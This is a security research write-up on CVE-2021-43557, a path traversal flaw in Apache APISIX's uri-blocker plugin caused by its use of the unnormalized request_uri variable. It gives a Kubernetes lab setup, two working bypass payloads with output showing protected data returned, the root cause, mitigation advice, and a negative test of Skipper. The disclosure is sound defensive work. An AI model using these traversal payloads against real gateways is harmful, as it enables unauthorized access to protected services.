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APISIX request_uri variable with risk of path penetration

· 4 min read

Research report about Apache APISIX Path traversal in request_uri variable(CVE-2021-43557)

In this article I will present my research on insecure usage of $request_uri variable in Apache APISIX ingress controller. My work end up in submit of security vulnerability, which was positively confirmed and got CVE-2021-43557. At the end of article I will mention in short Skipper which I tested for same problem.

Apache APISIX is a dynamic, real-time, high-performance API gateway. APISIX provides rich traffic management features such as load balancing, dynamic upstream, canary release, circuit breaking, authentication, observability, and more.

Why $request_uri ? This variable is many times used in authentication and authorization plugins. It’s not normalized, so giving a possibility to bypass some restrictions.

In Apache APISIX there is no typical functionality of external authentication/authorization. You can write your own plugin, but it’s quite complicated. To prove that APISIX is vulnerable to path-traversal I will use uri-blocker plugin. I’m suspecting that other plugins are also vulnerable but this one is easy to use.

Setting the stage

Install Apache APISIX into Kubernetes. Use Helm Chart with version 0.7.2:

helm repo add bitnami
helm repo update
kubectl create ns ingress-apisix
helm install apisix apisix/apisix \
--set gateway.type=NodePort \
--set ingress-controller.enabled=true \
--namespace ingress-apisix \
--version 0.7.2
kubectl get service --namespace ingress-apisix

In case of problems follow official guide.

To create ingress route, you need to deploy ApisixRoute resource:

kind: ApisixRoute
name: public-service-route
- name: public-service-rule
- app.test
- /public-service/*
- serviceName: public-service
servicePort: 8080
- name: proxy-rewrite
enable: true
regex_uri: ["/public-service/(.*)", "/$1"]
- name: protected-service-rule
- app.test
- /protected-service/*
- serviceName: protected-service
servicePort: 8080
- name: uri-blocker
enable: true
block_rules: ["^/protected-service(/?).*"]
case_insensitive: true
- name: proxy-rewrite
enable: true
regex_uri: ["/protected-service/(.*)", "/$1"]

Let’s dive deep into it:

  • It creates routes for public-service and private-service
  • There is proxy-rewrite turned on to remove prefixes
  • There is uri-blocker plugin configured for protected-service. It can look like mistake but this plugin it about to block any requests starting with /protected-service


I’m using Apache APISIX in version 2.10.0.

Reaching out to Apache APISIX routes in minikube is quite inconvenient: kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is -H 'Host: app.test'. To ease my pain I will write small script that will work as template:


kubectl exec -it -n ingress-apisix apisix-dc9d99d76-vl5lh -- curl --path-as-is$1 -H 'Host: app.test'

In your case replace apisix-dc9d99d76-vl5lh with name of actual Apache APISIX pod.

Let’s start with validation if routes and plugins are working as expected:

$ ./ "/public-service/public"
Defaulted container "apisix" out of: apisix, wait-etcd (init)
{"data":"public data"}
$ ./ "/protected-service/protected"
Defaulted container "apisix" out of: apisix, wait-etcd (init)
<head><title>403 Forbidden</title></head>
<center><h1>403 Forbidden</h1></center>

Yep. public-service is available and protected-service is blocked by plugin.

Now let’s test payloads:

$ ./ "/public-service/../protected-service/protected"
Defaulted container "apisix" out of: apisix, wait-etcd (init)
{"data":"protected data"}

and second one:

$ ./ "/public-service/..%2Fprotected-service/protected"
Defaulted container "apisix" out of: apisix, wait-etcd (init)
{"data":"protected data"}

As you can see in both cases I was able to bypass uri restrictions.

Root cause

uri-blocker plugin is using ctx.var.request_uri variable in logic of making blocking decision. You can check it in code:

Click to Preview


  • Attacker can bypass access control restrictions and perform successful access to routes that shouldn’t be able to;
  • Developers of custom plugins have no knowledge that ngx.var.request_uri variable is untrusted.

Search for usage of var.request_uri gave me a hint that maybe authz-keycloak plugin is affected. You can see this code, it looks really nasty. If there is no normalization on keycloak side, then there is high potential for vulnerablity.


In case of custom plugins, I suggest to do path normalization before using ngx.var.request_uri variable. There are also two other variables, high probably normalized, to check ctx.var.upstream_uri and ctx.var.uri.


Skipper is another ingress controller that I have investigated. It’s not easy to install it in kubernetes, because deployment guide and helm charts are outdated. Luckily I have found issue page where developer was describing how to install it. This ingress gives possibility to implement external authentication based on webhook filter:

kind: Ingress
name: my-ingress
annotations: |
modPath("^/.*/", "/") -> setRequestHeader("X-Auth-Request-Redirect", "${request.path}") -> webhook("http://auth-service.default.svc.cluster.local:8080/verify")

To add some interesting headers that could help in access control decision, you need to do it manually with setRequestHeader filter. There is template available to inject variable by ${}. Sadly (for attackers) ${request.path} is having normalized path. I see in code that developers are not using easily RequestURI or originalRequest.

I wasn’t able to exploit path traversal in this case. Skipper remains safe.


Apache APISIX is vulnerable for path traversal. It’s not affecting any external authentication, but plugins that are using ctx.var.request_uri variable.

Whole code of this example is here